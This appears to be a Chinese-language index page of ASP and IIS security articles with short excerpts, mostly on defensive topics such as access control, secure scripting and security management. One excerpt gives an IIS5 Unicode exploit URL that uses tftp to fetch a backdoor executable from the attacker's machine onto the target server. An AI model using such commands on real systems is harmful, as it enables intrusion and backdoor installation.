| 以我与“黑客”的一段遭遇简单谈ASP的安全性 |
| 我做了一个网站 www.zydn.net ,算是个人主页吧,虽不是以个人名义,但确实只有我一个人做这个事,我的站有一套后台系统,用ASP写成的,主机用的万网的,但昨天我一上网,发现我的调查被改了,我还以为是我自己输入错了。赶忙改回来,不过过一会儿看又被改啦,还改得更厉害:调查是,问我写的一个软件是否有用,我准备的答…… |
|
| ASP中页面限权访问的几种方法 |
| 在设计网页时,经常遇到某些页面需限权访问的情况。比如,一个公司的某些产品只让某一或某些供应商或客户浏览。那么,我们如何实现这一功能呢?本文,笔者将向读者介绍几种限制客户访问权限的方法。
通常,我们在设计过程中会面临三种情况:某一页面只让某一用户浏览、某一页面只让某些用户浏览和某些页面只让某…… |
|
| IIS5 UNICODE 编码漏洞的利用心得补充 |
| 看了你的文章【unicode】写的很好,
我来说说用tftp怎么搞:
下载http://www.cners.com/tools/unicode.zip(下载快着呢)
解压:
tftpd32.exe
ncx99.exe
本机运行tftpd32.exe
再(接着你的来):
http://192.168.8.48/scripts/ccc.exe?/c+tftp -i 本地ip GET ncx99.exe c:\\inetpub\\scripts\\hihi.exe
…… |
|
| IIS5 UNICODE 编码漏洞的利用心得 |
|
大家一定都知道那个风光了很久的IIS5 UNICODE 编码漏洞吧。没办法,第一篇教程不知道写什么好,随便先凑合着,
就写一下这个漏洞的攻击心得吧。
1 首先我们来看看这个漏洞的原理。
在中文版的IIS4,和ISS5中,存在一个BUG,原因是UNICODE编码 存在BUG 在UNICODE 编码中,发现了一个奇怪的编码方
式,
例如…… |
|
| 一个颇有用途的ISAPIFILTER(使您的INC、ASA文件安全一 |
| 在以前看到老外的一篇文章,现在记不起这个很不错的热情的有如我一般的年轻人了,不过邮箱里还有和他讨论的邮件。
有不少站点可能都有这样的情况,利用.inc以及.asa包含文件来存储数据库连接信息,特别是.inc的文件,想改掉有需要太多的时间和做大幅度的程序调整,比如我有个客户就是光.inc文件就有几十个,更别说asp文件了…… |
|
| 安全脚本程序的编写 V1.0 |
| 基本思路:
为没一个功能写一个独立的程序,程序页
尽可能少的让客户了解你的服务器端信息
不要用"客户应该这么写"这个思路想问题
尽可能多的想到不可能发生的事情
1.关于交互式动态网页可能存在的问题
1.1 form类型的交互
1.1.1 概念介绍
在我们和浏览者进行交互时,最常用到的就是form(post/get/put方法),虽然…… |
|
| 网页过期的问题 |
| 防止使用者按上一頁按鈕
討論區上常有網友問到這個問題, 如何防止使用者按回上一頁按鈕, 為何會問這一個問題? 應該通常是在防止使用者重複執行一個應用程式, 例如資料庫的新增, 如果使用者按了回上一頁, 有可能會造成重複新增資料, 今天這篇文章就要介紹如何 "盡可能" 的防止使用者按回上一頁
伺服端防止快取
首先…… |
|
| 透過 ASP 修改 NT 使用者密碼 |
| 使用者登入機制在未來的網頁開發會顯得越來越重要, 很簡單的道理, 因為現在的網站很著急的要做好會員管理, 然後向會員收錢, 其實這是很正常的代誌, 台灣的公司法說的很清楚嘛, 『公司以營利為目的』
在 IIS 5.0 的安全性身分驗證機制中, 整合的 Windows 驗證 (在 IIS 4.0 號做 Windows NT 挑戰與回應) 是一個不歹的選擇,…… |
|
| 加密QueryString数据 |
| Problem with Query String Method
Often time we use query string collection to retrieve an unique record from a table. Notice the following
piece of code -
Detail.asp?RecordID=200
Here we are passing a query string value called "RecordID" using the url. We then use the Query String
col…… |
|
| 安全维护 IIS asp 站点的高级技巧 |
| 一:前言
(仅以此文感谢好友bigeagle。不是他,我可能不用这么担心win2000安全问题的。呵呵!)
人说,一朝被蛇咬,十年怕.....。就是这样。2000年初,当我终于摆脱winnt 4.0 server那可怕的补
丁之旅,迈向win2000 server时。我终于可以比较放心我的服务器了。但随着sp1的补丁出现。我知道,
与微软的补丁因…… |
|
| 如何实现 DES 算法(全) |
| 这是摘自清华BBS的一篇文章,洋文的,小弟把它翻成中文请各位高手指点。
分号(;)后的话是小弟的翻译,井号(#)后的是小弟的一点感想。
How to implement the
Data Encryption Standard (DES)
A step by step tutorial
…… |
|
| Asp的安全管理(12) |
| 附录 C:网络安全的最佳方案
Steve Riley,Microsoft Communications Industry Solutions Group Consulting Practice
2000 年 8 月 7 日
这篇短文论述了网络设计和安全的最佳方案。尽管网络的设计和安全保护方法很多,但只有某些方法和步骤深受许多业内人士的喜欢。
筛选路由器 — 第一道防线
应当使用筛选路…… |
|
| Asp的安全管理(11) |
| 附录 B:访问策略最佳方案
ASP 的组策略对象 (GPO) 的最佳配置方案
在基于 Windows 2000 Active Directory 的 ASP 企业环境中工作时,认真设计策略非常重要,它可以最大程度地减少冗余和重新定义,并最大程度地增加可管理性。遗憾的是,这两个目标可能发生矛盾。要减少冗余和重新定义,ASP 应当设法定义非常详尽的 GPO。…… |
|
| Asp的安全管理(10) |
| 小结
保护客户和 ASP 的数据不受到恶意攻击(有意的或无意的)的损害是“安全管理”的全部内容。对安全管理是什么以及 ASP 及其客户可以采取的方法有一个清晰的了解非常关键,其中包括什么是安全策略以及需要达到什么样的安全级别。需要确定 SLA 本身以及它提供的安全级别,并需要采取相应的安全措施。安全措施包括人员、…… |
|
| Asp的安全管理(9) |
| 案例研究:遭受攻击
引言
一个很大的虚构银行企业分了好多个部门,其中两个分别为外部银行业务部门和内部支持部门。所有本地办公室都属于外部银行业务部门。所有的支持活动(例如市场、销售和 IT)都属于内部支持部门。为了使该企业赢利,这两个部门需要在工作中紧密合作。
不久前,IT 部门与某个 ASP 达成了一项协议…… |
|
| Asp的安全管理(8) |
| ASP 的安全配置工具
ASP 管理员应当对安全配置工具非常熟悉,因为要获得系统中与安全相关的所有方面的信息,这是必不可少的。
这些工具应当使您非常容易地回答以下问题:“我的计算机安全吗?”,或者“我的网络安全吗?”。这些工具应当允许对已定义的安全策略所包含的所有方面进行配置和分析,例如:
帐号策略。 …… |
|
| Asp的安全管理(7) |
| ASP 的最佳安全做法
引言
安全管理的主要目标是保证 SLA 中规定的 ASP 和客户之间的机密性、完整性和可用性的级别。最佳做法可向 ASP 展示如何确保实现安全目标。
Active Directory 的主要安全优势
使用 Active Directory 服务,ASP 可更好地为内部用户和外部客户提供适当的安全性。从根本上说,Active Directory 是…… |
|
| Asp的安全管理(6) |
| ASP 安全方面的沟通与培训
引言
没有适当的沟通,安全方法和安全过程无疑将会失败。安全沟通指的是与客户、与 ASP 的内部人员、与供应商以及与其他第三方(如与 Forum for Incident Response and Security Teams(事件响应和安全小组论坛),FIRST)的沟通。在安全方法和策略的设计中以及执行过程中,沟通都是很重要的。…… |
|
| Asp的安全管理(5) |
| ASP 的安全策略
ASP 为什么需要安全策略?
在 ASP 的安全管理过程中,必须有一个通道来及时地传递任何一个给定点的现有状态。安全策略充当了这一角色。它们是对 ASP 一贯使用的当前安全要求和指导方针以及步骤的书面表示。一致的策略将使 ASP 内部清楚在安全方面必须做什么。如果 ASP 要看到在安全状态上的迅速改进,则…… |
|
| Asp的安全管理(4) |
| 有关本章中论及的所有主题的详细信息,请参见 ITIL Library 的“Security Management”部分: http://www.itil.co.uk/ 或 ITIL Security Management 一书 (ISBN 0 11 330014 X)。
与其它 MOF 层面的关系
安全管理功能与涉及安全问题的其它 MOF 层面关系密切。这些问题包括数据的机密性、完整性和可用性,以及硬件和软件…… |
|
| « ‹ [1][2][3] › » 20条/页 共49条 |
